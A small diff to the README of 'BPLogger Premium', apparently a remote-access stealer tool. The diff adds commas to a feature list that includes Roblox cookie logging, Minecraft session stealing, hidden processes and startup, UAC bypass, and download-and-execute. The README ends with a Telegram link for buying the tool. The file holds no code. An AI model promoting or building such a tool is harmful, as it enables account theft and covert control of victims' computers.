BPLogger/BPLoggerPremium/README.md

 Some of those options are
-Remote Desktop
+Remote Desktop,
-File Manager
+File Manager,
-Hidden File
+Hidden File,
-Hidden Process
+Hidden Process,
-Hidden Startup
+Hidden Startup,
-Roblox Cookie Logger
+Roblox Cookie Logger,
-Minecraft Session Stealer
+Minecraft Session Stealer,
-Download & Execute
+Download & Execute,
-Upload & Execute
+Upload & Execute,
-UAC Bypass
+UAC Bypass,
-System Info
+System Info,
-Elevate Client Permissions
+Elevate Client Permissions,

 If you would like to purchase the premium version of BPLogger Join Our Telegram https://t.me/BPLogger